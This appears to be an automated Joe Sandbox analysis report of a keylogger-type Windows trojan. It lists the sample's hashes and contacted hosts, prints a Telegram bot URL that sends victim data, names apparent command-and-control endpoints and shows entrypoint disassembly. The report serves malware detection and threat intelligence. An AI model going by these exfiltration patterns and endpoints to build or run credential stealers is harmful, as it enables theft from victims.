                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    		188.114.96.3
                    		truetrue
                      		unknown
                      api.telegram.org
                      		149.154.167.220
                      		truetrue
                        		unknown
                        mail.irco.com.sa
                        		46.151.208.21
                        		truetrue
                          		unknown
                          checkip.dyndns.com
                          		193.122.6.168
                          		truefalse
                            		unknown
                            checkip.dyndns.org
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2009/10/2024%20/%2023:08:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		unknown
                                https://reallyfreegeoip.org/xml/8.46.123.33false
                                • URL Reputation: safe
                                		unknown
                                http://checkip.dyndns.org/false
                                • URL Reputation: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/RegSvcs.exe, 00000002.00000002.4794997601.00000000029CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://api.telegram.org/botRegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.4794997601.000000000299E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000029CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://varders.kozow.com:8081RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		unknown
                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://aborters.duckdns.org:8081RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  		unknown
                                                  http://mail.irco.com.saRegSvcs.exe, 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002935000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://51.38.247.67:8081/_send_.php?LRegSvcs.exe, 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://reallyfreegeoip.org/xml/8.46.123.33$RegSvcs.exe, 00000002.00000002.4794997601.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.0000000002857000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://anotherarmy.dns.army:8081RegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        		unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://checkip.dyndns.org/qRegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4794997601.000000000289C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.4796478018.0000000003801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedRegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          		unknown
                                                          https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000002.00000002.4794997601.000000000282E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          		api.telegram.orgUnited Kingdom
                                                          		62041TELEGRAMRUtrue
                                                          46.151.208.21
                                                          		mail.irco.com.saSaudi Arabia
                                                          		51975NASHIRNET-ASNNASHIRNETASNSAtrue
                                                          193.122.6.168
                                                          		checkip.dyndns.comUnited States
                                                          		31898ORACLE-BMC-31898USfalse
                                                          188.114.96.3
                                                          		reallyfreegeoip.orgEuropean Union
                                                          		13335CLOUDFLARENETUStrue

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1529912
                                                          Start date and time:2024-10-09 14:44:09 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 7m 12s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:6
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:7DI4iYwcvw.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:2b4eae5d8282eacacd17d2fdec8bf3e052baa7e7f60276854b9c077183aa2176.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@3/1@4/4
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 75
                                                          • Number of non-executed functions: 28
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • VT rate limit hit for: 7DI4iYwcvw.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          08:45:15API Interceptor11384522x Sleep call for process: RegSvcs.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          149.154.167.220TBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                              9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                    IT3rIaXTLZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                      9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        pQGOxS84rW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          aq4u3y2hLo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            Opposer.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              193.122.6.168aq4u3y2hLo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              Commercial_Invoice_Remittance_Copies_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              rRdJ0JnTcM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              HWAf2RPKH6.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              kG713MWffq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              rRdJ0JnTcM.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              9WFX0d4wa8.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              Mellekelve a proforma szamla.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              Purchase 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              reallyfreegeoip.orgTBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              ZH0pJV4XmV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              awb_dhl 9102845290_160924R0 _323282-_563028621286.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              checkip.dyndns.comTBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 132.226.8.169
                                                                              9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              ZH0pJV4XmV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 132.226.8.169
                                                                              0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 132.226.247.73
                                                                              wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 132.226.8.169
                                                                              awb_dhl 9102845290_160924R0 _323282-_563028621286.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 132.226.8.169
                                                                              9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              api.telegram.orgTBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              IT3rIaXTLZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              pQGOxS84rW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              aq4u3y2hLo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Opposer.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              ORACLE-BMC-31898US9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              pQGOxS84rW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              aq4u3y2hLo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              Commercial_Invoice_Remittance_Copies_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              Scanned.pdf.pif.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              Zapytanie ofertowe (LINCOLNELECTRIC 100924).vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              rRdJ0JnTcM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              ixgyfGK4yl.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              TELEGRAMRUTBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              IT3rIaXTLZ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              pQGOxS84rW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              aq4u3y2hLo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Opposer.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              CLOUDFLARENETUSPaymentIBAN Confirmation.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.212.58
                                                                              SWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                              • 188.114.97.3
                                                                              TBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                              • 104.21.16.225
                                                                              Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              Ordin de plat#U0103.docx.docGet hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3
                                                                              COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                              • 104.21.16.225
                                                                              PAYMENT APPLICATION.xlsGet hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3
                                                                              lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                                                              • 188.114.96.3
                                                                              COT139562833.ATMetorlogya.xlsGet hashmaliciousUnknownBrowse
                                                                              • 172.67.216.69
                                                                              NASHIRNET-ASNNASHIRNETASNSA92.249.48.47-skid.x86-2024-07-20T09_04_17.elfGet hashmaliciousMirai, MoobotBrowse
                                                                              • 185.79.251.94
                                                                              Request For Quotation - ( 11 APR 2022) exp. 15 APR 2022.pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 46.151.208.26

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              54328bd36c14bd82ddaa0c04b25ed9adTBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              ZH0pJV4XmV.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              wUOozlNZS3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              awb_dhl 9102845290_160924R0 _323282-_563028621286.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              9EIf7Sfk3P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              3b5074b1b5d032e5620f69f9f700ff0eSWIFT 103 202410071251443120 071024-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                              • 149.154.167.220
                                                                              SAS #U00e7#U0131kt#U0131.PDF.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              TBC-9720743871300.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              PAGO.vbsGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              Request for Quotation MK FMHS.RFQ.24.142.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              TRASFERENCIA.vbsGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              SAS #U00e7#U0131kt#U0131.PDF.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              9od7uqtxVz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              wrE1XO6ZFI.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\juvenilely

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\7DI4iYwcvw.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):276992
                                                                              Entropy (8bit):6.919788310434921
                                                                              Encrypted:false
                                                                              SSDEEP:6144:0pecUYpsZwW7PYDPAVZMTncg6I3GPOevf5j2KJFY2ee/Rd+gFrknqwKGnb:0pecUY6Zt7PYDPAVZMTncf02O+RCKJF4
                                                                              MD5:7CB974580A956C51F1B75E08FC5A9183
                                                                              SHA1:26FC8ECA0F96A34EDCF010F1ECFB24F771EFD234
                                                                              SHA-256:DABE5CD567B68F8D23D4C8BE82A4BC5E03FF2E01F11A2BA19BE020C78AB469DB
                                                                              SHA-512:4943FEC9BE8D07E843B2FE4B1232B67C880F72AB64FA55FA4A2C94D7F90428891CFC15DB58A18136FEDF2294288E5233829FA56E212E1D77591F5CBB85C79032
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:z..LED7V^M8S..93.Q37Q7LM.FD7VZM8SKS93JQ37Q7LMLFD7VZM8SKS93JQ.7Q7BR.HD._.l.R...g"8@.!E#*>').5;#V<?s[Vj#FYq^"m....;5)]}F^3.JQ37Q7L..FD{WYM...593JQ37Q7.MNGO6.ZM.WKS-3JQ37Q9.ILFd7VZ-<SKSy3Jq37Q5LMHFD7VZM8WKS93JQ37.3LMNFD7VZM:S..93ZQ3'Q7LM\FD'VZM8SKC93JQ37Q7LML..3V.M8SK3=3]A37Q7LMLFD7VZM8SKS93.U3;Q7LMLFD7VZM8SKS93JQ37Q7LMLFD7VZM8SKS93JQ37Q7LMLFD7VZm8SCS93JQ37Q7LMDfD7.ZM8SKS93JQ3.%R49LFD#u^M8sKS9.NQ35Q7LMLFD7VZM8SKs93*.AD#TLMLQT7VZ-<SKA93Jw77Q7LMLFD7VZM8.KSy.84_X27LALFD7.^M8QKS9.NQ37Q7LMLFD7VZ.8S.S93JQ37Q7LMLFD7V..<SKS93.Q37S7IMh.F7..L8PKS9.JQ5[.5L.LFD7VZM8SKS93JQ37Q7LMLFD7VZM8SKS93JQ37Q7LML.9.Y...:8..3JQ37Q6NNH@L?VZM8SKS9MJQ3qQ7L.LFD.VZM.SKST3JQ.7Q72MLF:7VZ)8SK!93J037QpLML)D7V4M8S5S93TS..Q7FgjFF.wZM2Sa.J.JQ9.P7LI?eD7\.O8SO .3J[.4Q7H>iFD=.^M8W8u93@.67Q3f.LE.!PZM#<rS99JR."W7LVf`D5~`M8YKy.3I.&1Q7WgnFF._ZM<y. $3JW.tQ7F9EFD5.PM8WaM;..Q3={.2FLF@.VpoF_KS=.J{.I\7LIgFn)T.@8SOy.MDQ33z7fo2ID7RqM.MI.63JU../'LMHmD.t$\8SOx9.h/!7Q3gMfd:$VZI.SaqG'JQ7.Q.n3YFD3}Zg.-]S97aQ../ LMHmD.t$U8SOx9.TS./Q7HgJl&7$.X8#H

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.4796103400524805
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:7DI4iYwcvw.exe
                                                                              File size:1'257'083 bytes
                                                                              MD5:e142f0bf6c0d9be52f8c7f52007c64d0
                                                                              SHA1:36d40ea847e5f16424951fc9a5bd19f739705c87
                                                                              SHA256:2b4eae5d8282eacacd17d2fdec8bf3e052baa7e7f60276854b9c077183aa2176
                                                                              SHA512:a334eabb9f749c006c36392d065f22026589edca7bba4ee40f41feaf224fa824f1c8d8f0673a6c9307c3c7e9583b390f198b2d036d056d0f685df55f88e755a9
                                                                              SSDEEP:24576:uRmJkcoQricOIQxiZY1iaC3SdUyu5RvluTUUOtioFCl1Hy:7JZoQrbTFZY1iaC3kUyrTStiXS
                                                                              TLSH:8345E121B9C69036C2B323B19E7FF769963D79360336D29727C82D225EA04416B39773
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                              File Icon

                                                                              Icon Hash:1733312925935517

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4165c1
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:0
                                                                              File Version Major:5
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007FDBA8D2AA3Bh
                                                                              jmp 00007FDBA8D218AEh
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push edi
                                                                              push esi
                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                              mov ecx, dword ptr [ebp+10h]
                                                                              mov edi, dword ptr [ebp+08h]
